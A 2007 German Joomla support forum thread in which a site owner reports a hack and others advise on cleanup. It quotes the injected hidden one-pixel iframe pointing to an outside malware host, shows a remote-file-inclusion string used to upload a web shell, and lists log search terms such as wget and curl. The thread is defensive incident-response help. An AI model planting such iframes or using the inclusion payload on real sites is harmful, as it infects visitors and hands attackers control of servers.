Erweiterungen & Templates für Joomla     Support Chat     JoomlaJobs    

   

 

Zurück   Joomla CMS Support Forum > Joomla 1.0x > Sicherheit
Benutzername
Kennwort
Antwort
 
LinkBack Themen-Optionen Thema durchsuchen Ansicht

  #1 (permalink)
Alt 08.05.2007, 14:35
Joomla Newbie
 
Registriert seit: 07.05.2007
Beiträge: 6
Bedankte sich: 0
0 Danksagungen in 0 Beiträgen
Standard Hacker auf Webseite

Hallo, meine Seite wurde gehackt. Nun steht in der ersten zeile der Seite, wenn ich mir den Quelltext anschaue ein iframe. Hat jemand eine Idee wie der dahin kommen könnte??? Muss ja irgendwo in einem Script stehen. Ich finde aber nichts.

Zitat:
<iframe width='1' height='1' border='0' frameborder='0' src='http://gashar.info/stds/go.php?sid=3'></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta **********="Content-Type" content="text/html;>charset=iso-8859-1" />
<title>Team NoSports - Home</title>
<meta name="description" content="Team No Sports NoSports TeamNOSports mountainbike bike marathon crosscountry einbeck mountainbiking alpencorss scott lars berd gerd helder thomas tino dassel northeim bikesport bikenews news MTB \&quot;team no Sports\&quot; \&quot;No Sports\&quot; rennrad rr downhill biketeam bike-team bike-news atb bikelinks bike-links links cc ddmc" />
<meta name="keywords" content="Team No Sports NoSports TeamNOSports mountainbike bike marathon crosscountry einbeck mountainbiking alpencorss scott lars berd gerd helder thomas tino dassel northeim bikesport bikenews news MTB \&quot;team no Sports\&quot; \&quot;..............
larsm ist offline   Mit Zitat antworten
  #2 (permalink)
Alt 08.05.2007, 14:39
Premium Supporter
 
Benutzerbild von Lappsack
 
Registriert seit: 10.10.2004
Ort: Chemnitz
Beiträge: 1,170
Bedankte sich: 13
188 Danksagungen in 182 Beiträgen
Standard

Zitat:
Zitat von larsm Beitrag anzeigen
Hallo, meine Seite wurde gehackt. Nun steht in der ersten zeile der Seite, wenn ich mir den Quelltext anschaue ein iframe. Hat jemand eine Idee wie der dahin kommen könnte??? Muss ja irgendwo in einem Script stehen. Ich finde aber nichts.
hallo, hast du deine index.php und so weiter auch auf 777 stehen? Lade dir die Joomal12.zip und überspiele dir die index.php und schreibschütze sie
__________________
Es grüsst dich herzlich

The Lappsack
----------------------------------------------------------------------------
Wer Rechschreibefehler findet, darf Sie wie immer behalten
http://www.lappsack.de
Lappsack ist offline   Mit Zitat antworten
  #3 (permalink)
Alt 08.05.2007, 14:44
Joomla Newbie
 
Registriert seit: 07.05.2007
Beiträge: 6
Bedankte sich: 0
0 Danksagungen in 0 Beiträgen
Standard

Hi, hab ich schon gemacht. Leider ohne Erfolg.
larsm ist offline   Mit Zitat antworten
  #4 (permalink)
Alt 08.05.2007, 14:48
Premium Supporter
 
Benutzerbild von Lappsack
 
Registriert seit: 10.10.2004
Ort: Chemnitz
Beiträge: 1,170
Bedankte sich: 13
188 Danksagungen in 182 Beiträgen
Standard

Zitat:
Zitat von larsm Beitrag anzeigen
Hi, hab ich schon gemacht. Leider ohne Erfolg.
Nimm mal eine anderes Template. Das ist doch sicher auch 777 bei dir oder?

nur zum testen
__________________
Es grüsst dich herzlich

The Lappsack
----------------------------------------------------------------------------
Wer Rechschreibefehler findet, darf Sie wie immer behalten
http://www.lappsack.de

Geändert von Lappsack (08.05.2007 um 14:48 Uhr). Grund: sicher ist sicher
Lappsack ist offline   Mit Zitat antworten
  #5 (permalink)
Alt 08.05.2007, 14:55
Joomla Newbie
 
Registriert seit: 07.05.2007
Beiträge: 6
Bedankte sich: 0
0 Danksagungen in 0 Beiträgen
Standard

Da ist er dann auch drin. Ich hab auch schon ein Template neu installiert und auch da steht er drin. Auf 777 steht nichts. Ich hab auch schon den ganzen Quelltext nach dem iframe durchsucht -> Nichts. Könnte das aus der Datenbank kommen?
larsm ist offline   Mit Zitat antworten
  #6 (permalink)
Alt 08.05.2007, 15:53
chw
Joomlapapst
 
Registriert seit: 06.08.2006
Beiträge: 828
Bedankte sich: 2
161 Danksagungen in 150 Beiträgen
Standard

Meine Glaskugel weiß bestimmt wie der dahin kommt...
Benutze bitte mal die Suche, es gibt tausende gleicher Fragestellungen.

Vorweg: Abslout sinnlos ist ein einfaches entfernen oder überschreiben der index.php
Das behebt nicht die Lücke und garantiert auch nicht das noch andere schädliche Scripte auf dem Server verbleiben.

Folgender Vorgehensweise halte ich für angebracht:

- Logfiles vom hoster sichern bzw. Anfordern (alle die du bekommen kannst)
- Alle Dateien auf die lokale Festplatte kopieren, inkl der Datenbank (wichtig!).
- Dann alles (wirklich alles!) löschen.
- nun die logfiles nach verdächtigem durchsuchen
- Sicherheitslücke finden und beheben
- Frisches joomla installieren und saubere Backupdateien draufspielen

Wenn Du das Access_log nach folgenden Texten durchsuchst wirst Du warscheinlich schnell fündig: =http, wget, curl, mosconfig_
Gleichzeitig durchsuchst Du die Liste mit bekannten unsicheren Komponenten (und diese hier) und schaust ob da eine Installiert war.

Wenn das alles erfolglos war dann wende Dich an Deinen Hoster,
es könnte auch sein das ein anderer Kunde auf dem Server die Ursache ist.

EDIT
Hintergrund des ganzen: Wenn Du die Index.php überspielst und meinetwegen auch noch 400 setzt,
beibt die Lücke über die er zugriff erlangte ja weiterhin bestehen. Er kann dann z.B. einen php mailer hochladen und munter spam versenden. Meistens wird über eine Remotefile Inclusion "mosconfig_path=http://www.irgendwas,tdl/phpshell.gif) eine Mischung aus Filemanager und Shell hochgeladen. Da kann der dann mit den gleichen Rechten agieren wie joomla auch. Also Dateien anlegen, löschen, verändern.
Wenn Du nun nur die unsichere Komponente entfernst kann es sein das diese datei (mit der shell) weiterhin auf dem Server bleibt. Somit kann er sich ganz einfach wieder zugriff verschaffen, das war auch mit der grund warum das tauschen der index.php nichts gebracht hat. Die Lücke bleibt ja bestehen.
Die einzige lösung waäre ein dirketer Vergleich aller Daten und zwar Zeichen für Zeichen- sehr viel Arbeit ;-)
Daher ist es einfacher eine komplette neuinstallation mit aktuellem joomla und Komponenten zu verwenden und nur template, grafiken usw. hochzuladen. Die Inhalte stehen ja in der Datenbank.
chw ist offline   Mit Zitat antworten
Erhielt Danksagungen von:
  #7 (permalink)
Alt 10.05.2007, 09:59
Joomla Newbie
 
Registriert seit: 08.05.2007
Ort: Kiel
Beiträge: 3
Bedankte sich: 1
0 Danksagungen in 0 Beiträgen
Standard

Hallo ich habe das gleiche Problem,

deshalb erst einmal vielen Dank an chw für die Tipps zur Vorgehensweise.

@Lars: ich habe deine Seite eben besucht: Du scheinst das Problem gelöst zu haben. Bist du wie oben beschrieben vorgegangen und hast joomla und alle Komponenten neu installiert? Hast Du herausgefunden welche Komponente und was sonst für die Sicherheitslücke verantwortlich ist?

Gruß Philipp
Ph_Ro ist offline   Mit Zitat antworten
Werbung
Antwort


Themen-Optionen Thema durchsuchen
Thema durchsuchen:

Erweiterte Suche
Ansicht




Alle Zeitangaben in WEZ +2. Es ist jetzt 20:13 Uhr.

Powered by vBulletin Version 3.6.2 (Deutsch)
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.3.2
vBulletin Style by: vbdesigns.de
Copyright 2005 by Stefan Köller